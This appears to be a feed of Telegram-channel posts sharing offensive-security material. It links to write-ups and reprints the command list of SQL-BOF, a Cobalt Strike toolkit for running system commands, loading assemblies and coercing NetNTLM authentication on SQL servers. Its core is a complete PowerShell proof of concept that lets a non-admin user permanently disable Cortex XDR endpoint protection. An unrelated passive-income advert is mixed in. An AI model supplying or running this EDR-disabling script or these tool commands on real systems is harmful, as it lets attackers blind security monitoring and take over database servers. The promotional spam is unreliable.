Bug bounty Tips

Webcache poisoning 1. https://web.archive.org/web/20201125190336/https://tox7cv3nom.github.io/2020-08-05-how_i_was_able_to_pawned_website_via_escilating_webcache-deception-to-rce/ 2. https://freedium.cfd/https://infosecwriteups.com/cache-poisoning-of-wget-94a4d70104b1

https://t.me/bugbounty_tech?boost Boost kardo guys please

#reversing #Hardware_Security DJI Mavic 3 Drone Research Part 1 - Firmware Analysis: https://www.nozominetworks.com/blog/dji-mavic-3-drone-research-part-1-firmware-analysis Part 2 - Vulnerability Analysis: https://www.nozominetworks.com/blog/dji-mavic-3-drone-research-part-2-vulnerability-analysis

🎉🎊🎊🎊 500 followers

SQL-BOF A library of beacon object files to interact with remote SQL servers and data. This collection is templated off the TrustedSec CS-Situational-Awareness-BOF collection and models the functionality of the SQLRecon project. Usage Load the aggressor script located at SQL/SQL.cna. Available commands Commands Usage Notes sql-adsi [server] [ADSI_linkedserver] [opt: port] [opt: database] [opt: linkedserver] [opt: impersonate] Obtain ADSI creds from ADSI linked server sql-agentcmd [server] [command] [opt: database] [opt: linkedserver] [opt: impersonate] Execute a system command using agent jobs sql-agentstatus [server] [opt: database] [opt: linkedserver] [opt: impersonate] Enumerate SQL agent status and jobs sql-checkrpc [server] [opt: database] [opt: linkedserver] [opt: impersonate] Enumerate RPC status of linked servers sql-clr [server] [dll_path] [function] [opt: database] [opt: linkedserver] [opt: impersonate] Load and execute .NET assembly in a stored procedure sql-columns [server] [table] [opt: database] [opt: linkedserver] [opt: impersonate] Enumerate columns within a table sql-databases [server] [opt: database] [opt: linkedserver] [opt: impersonate] Enumerate databases on a server sql-disableclr [server] [opt: database] [opt: linkedserver] [opt: impersonate] Disable CLR integration sql-disableole [server] [opt: database] [opt: linkedserver] [opt: impersonate] Disable OLE Automation Procedures sql-disablerpc [server] [linkedserver] [opt: database] [opt: impersonate] Disable RPC and RPC out on a linked server sql-disablexp [server] [opt: database] [opt: linkedserver] [opt: impersonate] Disable xp_cmdshell sql-enableclr [server] [opt: database] [opt: linkedserver] [opt: impersonate] Enable CLR integration sql-enableole [server] [opt: database] [opt: linkedserver] [opt: impersonate] Enable OLE Automation Procedures sql-enablerpc [server] [linkedserver] [opt: database] [opt: impersonate] Enable RPC and RPC out on a linked server sql-enablexp [server] [opt: database] [opt: linkedserver] [opt: impersonate] Enable xp_cmdshell sql-impersonate [server] [opt: database] Enumerate users that can be impersonated sql-info [server] [opt: database] Gather information about the SQL server sql-links [server] [opt: database] [opt: linkedserver] [opt: impersonate] Enumerate linked servers sql-olecmd [server] [command] [opt: database] [opt: linkedserver] [opt: impersonate] Execute a system command using OLE automation procedures sql-query [server] [query] [opt: database] [opt: linkedserver] [opt: impersonate] Execute a custom SQL query sql-rows [server] [table] [opt: database] [opt: linkedserver] [opt: impersonate] Get the count of rows in a table sql-search [server] [search] [opt: database] [opt: linkedserver] [opt: impersonate] Search a table for a column name sql-smb [server] [\\listener] [opt: database] [opt: linkedserver] [opt: impersonate] Coerce NetNTLM auth via xp_dirtree sql-tables [server] [opt: database] [opt: linkedserver] [opt: impersonate] Enumerate tables within a database sql-users [server] [opt: database] [opt: linkedserver] [opt: impersonate] Enumerate users with database access sql-whoami [server] [opt: database] [opt: linkedserver] [opt: impersonate] Gather logged in user, mapped user and roles sql-xpcmd [server] [command] [opt: database] [opt: linkedserver] [opt: impersonate] Execute a system command via xp_cmdshell References SQLRecon by @sanjivkawa PySQLRecon CS-Situational-Awareness-BOF

😈 Deactivating Cortex XDR via repair function It is trivially possible to disable the Cortex EDR as a non-admin user by triggering a repair function. This is only working, if the Tamper Protection is not enforced! PoC:

Write-host "Try to get GUID" $installed = Get-WmiObject Win32_Product $string= $installed | select-string -pattern "Cortex" Write-host "Found $string" $string[0] -match '{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}}' Write-host "$string[0]" Write-host "Found GUID $($matches[0].toString())" Write-host "Starting the repair $($matches[0].toString())" Start-Process -FilePath "msiexec.exe" -ArgumentList "/fa $($matches[0])" Write-Host "Wait until XDR is deactivated and press [ENTER]" Read-Host taskkill /F /IM msiexec.exe Start-Sleep 2 taskkill /F /IM msiexec.exe Write-Host "If worked, EDR is permanent broken, at least until the repair is started again with : `n Start-Process -FilePath `"msiexec.exe`" -ArgumentList `"/fa $($matches[0])`""

The PoC was tested against Cortex XDR 8.1.1.4337. Blog: https://badoption.eu/blog/2024/03/23/cortex.html

🤩How to Generate Passive Income with AI-Powered Children's Story Books. This simple children’s story book has made more than $176,000 in passive income in today’s video. I will show you how to start a similar business starting with coming up with an idea for a children’s story book, building the core content, creating works of art, and a complete high-quality story, all powered by cutting-edge AI technology. This business has generated an impressive passive income of $176,000. If you want to generate passive income, I encourage you to watch the video. #MidJourney ⚡️ #OpenAI ⚡️ #ChatGPT Subscribe 🔹 Donate 🔹 Advertise 🧙‍♂️ Now I Know!  👩 Unreal Beauty

Windows exploitation by Fu11Shade https://web.archive.org/web/20200506122824/https://fullpwnops.com/windows-exploitation-pathway.html